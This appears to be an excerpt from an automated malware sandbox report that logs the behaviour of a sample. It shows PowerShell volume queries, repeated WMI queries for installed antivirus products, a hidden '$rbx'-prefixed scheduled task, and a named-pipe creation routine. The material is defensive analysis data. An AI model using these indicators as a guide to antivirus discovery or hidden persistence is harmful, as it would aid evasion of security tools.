Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 41_2_0000000140002300
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 20_2_000002527DEE8090
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.53.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct